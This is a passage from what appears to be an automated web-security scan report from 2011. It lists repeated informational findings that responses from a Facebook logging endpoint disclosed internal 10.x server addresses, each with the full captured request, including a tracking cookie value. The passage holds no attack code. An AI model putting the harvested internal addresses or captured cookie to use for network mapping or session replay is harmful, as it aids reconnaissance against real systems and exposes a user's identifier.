User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.219.32
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.553. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.1.64

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A304%2C%22baseline_elapsed%22%3A257%7D&asyncSignal=4341 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f688725%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.1.64
X-Cnection: close
Date: Thu, 16 Jun 2011 16:43:54 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.554. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.245.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1593%2C%22baseline_elapsed%22%3A1593%7D&asyncSignal=5001 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.245.45
X-Cnection: close
Date: Thu, 16 Jun 2011 17:45:58 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.555. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.216.47

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2063%2C%22baseline_elapsed%22%3A2063%7D&asyncSignal=7439 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.216.47
X-Cnection: close
Date: Thu, 16 Jun 2011 19:14:09 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.556. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.105.65

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1420%2C%22baseline_elapsed%22%3A1420%7D&asyncSignal=8231 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df315994844%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.105.65
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:53 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.557. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.252.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1488%2C%22baseline_elapsed%22%3A1564%7D&asyncSignal=850 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.252.57
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:31 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.558. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.144.33

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1671%2C%22baseline_elapsed%22%3A2105%7D&asyncSignal=1229 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.144.33
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:24 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.559. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.242.47

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1502%2C%22baseline_elapsed%22%3A1524%7D&asyncSignal=1781 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.242.47
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:21 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.560. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.20.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1936%2C%22baseline_elapsed%22%3A1636%7D&asyncSignal=4309 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df125679654%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.20.34
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:59 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.561. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.59.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1588%2C%22baseline_elapsed%22%3A1588%7D&asyncSignal=5304 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.59.34
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.562. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.157.113

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1168%2C%22baseline_elapsed%22%3A1348%7D&asyncSignal=8448 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f0119ec8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.157.113
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.563. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.23.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1173%2C%22baseline_elapsed%22%3A1175%7D&asyncSignal=1685 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdf1fc9ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.23.40
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.564. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.44

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1495%2C%22baseline_elapsed%22%3A2333%7D&asyncSignal=2654 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25baafde4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.145.44
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:30 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.565. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.117.41

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1250%2C%22baseline_elapsed%22%3A1250%7D&asyncSignal=2872 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc6c3354%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.117.41
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:26 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.566. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.146.60

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1621%2C%22baseline_elapsed%22%3A1621%7D&asyncSignal=8908 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d339e58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.146.60
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:29 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.567. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.60.42

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A356%2C%22baseline_elapsed%22%3A1151%7D&asyncSignal=7736 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa8396448%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.60.42
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:19 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.568. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.182.37

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1250%2C%22baseline_elapsed%22%3A1187%7D&asyncSignal=1726 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
